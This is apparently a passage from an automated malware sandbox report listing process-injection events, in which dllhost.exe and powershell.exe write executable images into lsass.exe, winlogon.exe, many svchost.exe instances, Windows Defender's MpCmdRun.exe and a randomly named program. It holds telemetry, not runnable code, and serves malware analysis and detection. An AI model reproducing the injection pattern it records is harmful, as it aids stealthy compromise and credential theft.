Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 870000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2680000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 710000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 520000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 680000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 1110000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2134E400000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 1A6A2460000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\conhost.exe base: 1EB0CEB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 182A5970000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 182A59A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: PID: 4056 base: 8590000 value: 4D
Source: C:\Windows\System32\dllhost.exe | Memory written: PID: 4056 base: 8D00000 value: 4D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread register set: target process: 7276
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread register set: target process: 7680
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread register set: target process: 1188
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread register set: target process: 1660
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\System32\dllhost.exe base: 140000000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\System32\dllhost.exe base: 140001000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\System32\dllhost.exe base: 140004000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\System32\dllhost.exe base: 140006000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\System32\dllhost.exe base: 140007000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\System32\dllhost.exe base: CA6708B010
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\winlogon.exe base: 1CA7D1B0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\lsass.exe base: 17D2DD20000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 22F4B8F0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\dwm.exe base: 262F1EB0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 23942AE0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1EF056A0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2287A7D0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1B94DA60000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 25202540000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1A9EBF90000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 19FF1600000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2A76A170000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 14D26990000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2175D5C0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1B0AB960000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2129B2A0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 26384180000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 25178730000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1495FCF0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 22125D90000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\svchost.exe base: 2234E0D0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2234E0D0000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2234E0D0000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2234E0D0000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2234E0D0000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2234E0D0000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2234E0D0000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2234E0D0000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2234E0D0000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2234E0D0000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2234E0D0000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2132CA20000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2132CA20000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2132CA20000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2132CA20000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2132CA20000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2132CA20000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2132CA20000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2132CA20000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2132CA20000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2132CA20000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2132CA20000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 26A8C0F0000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2234E100000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140001000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140004000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140006000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140007000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 498A22B010Jump to behavior
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\winlogon.exe base: 1CA7D1B0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\lsass.exe base: 17D2DD20000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 22F4B8F0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\dwm.exe base: 262F1CD0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 23942AE0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1EF056A0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2287AD70000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1B94DA60000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 25202540000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1A9EBF90000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 19FF1600000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2A76A170000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 14D26990000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2175D5C0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1B0AB960000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2129B2A0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 26384180000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 25178730000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1495FCF0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 22125DC0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 297A5D80000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2D0F41C0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2C325340000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2AEFC900000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 270F3530000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1D326280000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 16131E60000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2AE137C0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2C93A3B0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1E2E4190000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\spoolsv.exe base: 1450000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2AB68FA0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 265951C0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2C263510000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2234E100000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 18198570000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1EF3C5C0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 17ACFCF0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 19E8E330000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1B5A2950000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1CD340C0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1B653790000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1B19A0E0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 24730B30000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 15F35DA0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\sihost.exe base: 200792F0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 18CE9170000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1D959540000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 18F1AC00000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1FF01350000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\ctfmon.exe base: 221D2530000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1D400530000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\explorer.exe base: 8590000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 27844DD0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 258B00D0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1FA9A260000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\dasHost.exe base: 1BFB71A0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 26982020000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 185706E0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1496A4A0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\dllhost.exe base: 190043F0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 16215D30000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\smartscreen.exe base: 159AD5E0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 221570C0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1B8E5260000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 189090B0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 24BB1240000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 28182CD0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1BD9B7A0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 24261410000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\conhost.exe base: 1C7ADC40000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 3CB0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 242997D0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 9F0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 6D0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 7F0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: BA0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: C80000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2A60000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2830000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 610000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2A00000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: BD0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2910000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 15E0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 27C0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: B10000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2CC0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2A30000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 1080000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2AB0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 920000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: F20000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2FE0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 26A0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 27F0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 27E0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2E80000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2AF0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 890000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 22A0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2860000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 920000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: AA0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: AD0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2640000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: B40000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 1280000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 7E0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: F00000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 10B0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2CE0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2A00000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: C80000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: C20000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 26B0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 540000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 1050000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: F30000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2A70000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 7D0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 900000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2270000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: FE0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2040000
